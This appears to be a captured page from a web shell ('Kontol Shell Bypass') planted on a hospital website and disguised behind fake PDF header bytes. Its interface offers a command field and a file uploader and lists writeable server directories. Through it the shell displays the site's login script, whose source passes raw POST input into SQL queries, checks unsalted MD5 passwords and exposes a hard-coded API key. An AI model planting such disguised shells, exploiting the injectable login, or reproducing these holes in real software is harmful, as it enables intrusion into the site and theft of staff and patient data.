%PDF- <> %âãÏÓ endobj 2 0 obj <> endobj 3 0 obj <>/ExtGState<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 28 0 R 29 0 R] /MediaBox[ 0 0 595.5 842.25] /Contents 4 0 R/Group<>/Tabs/S>> endobj ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<>endobj 2 0 obj<> endobj 2 0 obj<>endobj 2 0 obj<>es 3 0 R>> endobj 2 0 obj<> ox[ 0.000000 0.000000 609.600000 935.600000]/Fi endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream

nadelinn - rinduu

Command :

ikan Uploader :
Directory :  /var/www/html/shardahospital_old.org/lp/hospital-lms/
Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 
Current File : /var/www/html/shardahospital_old.org/lp/hospital-lms/sign.php
<?php
session_start();
error_reporting(0);
require_once 'secure/db_config.php';

date_default_timezone_set('Asia/Kolkata');
$_SERVER['REMOTE_ADDR'];
//print_r($_POST);

/******* login detail *****************/

$url = json_decode(file_get_contents("http://api.ipinfodb.com/v3/ip-city/?key=2b3d7d0ad1a285279139487ce77f3f58d980eea9546b5ccc5d08f5ee62ce7471&ip=".$_SERVER['REMOTE_ADDR']."&format=json"));
$city_name  = $url->cityName;
$regionName = $url->regionName;
$ipAddress = $url->ipAddress;
$country_code  = $url->countryCode;
$latitude = $url->latitude;
$longitude = $url->longitude;
$timezone = $url->timeZone;


$login_date  = date('d-m-Y h:i:s');
$user_email = mysqli_real_escape_string($connection,stripslashes($_POST['user_email']));
$passwords = mysqli_real_escape_string($connection,stripslashes($_POST['user_password'])); 
$user_type = mysqli_real_escape_string($connection,stripslashes($_POST['user_type'])); 


$dataqwry = mysqli_query($connection,"SELECT id,email,password,user_type from `tbl_user` WHERE email='".$_POST['user_email']."' && password='".md5($passwords)."' && status='1'");
$drows = mysqli_fetch_array($dataqwry);
$usertYpess = $drows['user_type'];

if($usertYpess=='Administration'){
$stmt = mysqli_query($connection,"SELECT id,email,password,user_type from `tbl_user` WHERE email='".$_POST['user_email']."' && password='".md5($passwords)."'");
} if($usertYpess=='User'){
$stmt = mysqli_query($connection,"SELECT id,email,password,user_type from `tbl_user` WHERE email='".$_POST['user_email']."' && password='".md5($passwords)."'");	
}
$row =  mysqli_num_rows($stmt);

if($row > 0){
	
$datash =  mysqli_fetch_array($stmt);
$_SESSION['USENM'] = $datash['email'];	
$_SESSION['sid'] =  $datash['id'];
$_SESSION['utype'] =  $datash['user_type'];

echo "correct";
} else{
echo 'wrong';
}




?>


Kontol Shell Bypass